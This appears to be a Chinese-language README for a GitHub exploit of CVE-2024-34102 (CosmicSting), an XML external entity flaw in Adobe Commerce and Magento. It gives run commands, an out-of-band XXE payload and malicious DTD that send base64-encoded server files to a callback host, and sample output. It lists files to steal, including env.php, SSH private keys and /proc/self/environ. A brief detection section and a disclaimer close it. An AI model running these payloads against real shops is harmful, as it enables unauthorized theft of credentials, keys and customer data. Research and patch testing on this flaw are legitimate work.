针对 CVE-2024-34102 (CosmicSting) 的漏洞利用 - Adobe Commerce 和 Magento 中的 XML 外部实体 (XXE) 漏洞。
CVE-2024-34102 是一个严重的 XXE(XML 外部实体)漏洞,影响范围:
该漏洞允许未经身份验证的攻击者:
CVSS 评分: 9.8(严重)
此漏洞利用基于以下作者的原创工作:
# 克隆仓库
git clone https://github.com/YOUR_USERNAME/CVE-2024-34102.git
cd CVE-2024-34102
# 安装依赖
pip install -r requirements.txt
python3 exploit.py \
-u https://target.com \
-f /etc/passwd \
-c your-callback.oastify.com
终端 1 - DTD 服务器:
sudo python3 server_dtd.py
终端 2 - 漏洞利用:
python3 exploit.py \
-u https://target.com \
-f /etc/passwd \
-c your-callback.oastify.com \
--dtd-server YOUR-IP:8000
终端 1 - DTD 服务器:
sudo python3 server_dtd.py
终端 2 - 回调服务器(自动解码):
sudo python3 callback_server.py
终端 3 - 漏洞利用:
python3 exploit.py \
-u https://target.com \
-f /etc/passwd \
-c YOUR-CALLBACK-IP \
--dtd-server YOUR-DTD-IP:8000
-u, --url - 目标 URL(基础域名)-f, --file - 要读取的服务器文件(例如 /etc/passwd)-c, --callback - 回调服务器(IP/域名)--dtd-server - 自定义服务器,用于托管 DTD 文件--https - 对回调使用 HTTPS(默认:HTTP)python3 exploit.py \
-u https://vulnerable-site.com \
-f /etc/passwd \
-c abc123.oastify.com \
--dtd-server 192.168.1.100:8000
python3 exploit.py \
-u https://vulnerable-site.com \
-f /var/www/html/app/etc/env.php \
-c abc123.oastify.com \
--dtd-server 192.168.1.100:8000
python3 exploit.py \
-u https://vulnerable-site.com \
-f /home/ubuntu/.ssh/id_rsa \
-c abc123.burpcollaborator.net \
--dtd-server 192.168.1.100:8000 \
--https
该漏洞利用使用带外(Out-of-Band) XXE 技术来窃取数据:
<!-- 发送到目标的载荷 -->
<!DOCTYPE r [
<!ENTITY % sp SYSTEM "http://your-server/exploit.dtd">
%sp;
%param1;
]>
<r>&exfil;</r>
目标服务器下载恶意 DTD:
<!ENTITY % data SYSTEM "php://filter/convert.base64-encode/resource=/etc/passwd">
<!ENTITY % param1 "<!ENTITY exfil SYSTEM 'http://callback/?exploited=%data;'>">
服务器处理 XML,读取文件,以 base64 编码并发送到回调:
GET /?exploited=cm9vdDp4OjA6MDpyb290Oi9yb290Oi9iaW4vYmFzaAo...
echo "cm9vdDp4OjA6MDpyb290Oi9yb290Oi9iaW4vYmFzaAo..." | base64 -d
[*] CosmicSting XXE Exploit (CVE-2024-34102)
[*] Target: https://vulnerable-site.com
[+] Callback Server: abc123.oastify.com
[+] Using custom DTD server: 192.168.1.100:8000
[+] DTD URL: http://192.168.1.100:8000/12ec6594.dtd?callback=abc123.oastify.com&file=/etc/passwd&protocol=http
DTD will be dynamically generated with:
[*] Callback: http://abc123.oastify.com
[*] File: /etc/passwd
DTD server is running? Ready to continue? [y/N]: y
[+] Target file: /etc/passwd
[+] Callback URL: http://abc123.oastify.com/?exploited=...
[*] Sending XXE payload to: https://vulnerable-site.com/rest/V1/guest-carts/1/estimate-shipping-methods
[*] Response status: 500
[!] Status 500 - This is normal! XXE may have triggered.
[!] Check your callback server for incoming requests.
[*] Waiting for callback (5 seconds)...
=== CHECK YOUR CALLBACK SERVER ===
[!] Monitor your callback service for incoming HTTP requests
[!] Expected request: http://abc123.oastify.com/?exploited=<base64_data>
To decode the exfiltrated data:
[*] echo 'BASE64_STRING' | base64 -d
[!] Check your Burp Collaborator or Oastify dashboard now!
检测:
/rest/V1/guest-carts/*/estimate-shipping-methods 端点的 HTTP 请求<!ENTITY)的 XML 载荷发出告警缓解措施:
值得测试的文件:
/etc/passwd
/var/www/html/app/etc/env.php
/var/www/html/app/etc/local.xml
/home/USER/.ssh/id_rsa
/var/log/apache2/access.log
/proc/self/environ
此漏洞利用仅用于教育和安全研究目的。
在未经明确授权的情况下使用此代码测试系统是违法的。
您应对自己的行为承担全部责任。仅在以下环境使用:
✅ 您自己的测试环境
✅ 已授权的漏洞赏金计划
✅ 签约的渗透测试项目
禁止在以下环境使用:
❌ 未经授权的系统
❌ 未经许可的生产环境
❌ 任何恶意活动
作者不对滥用此代码的行为负责。
⭐ 如果这个项目对你有用,请考虑给它一个 Star!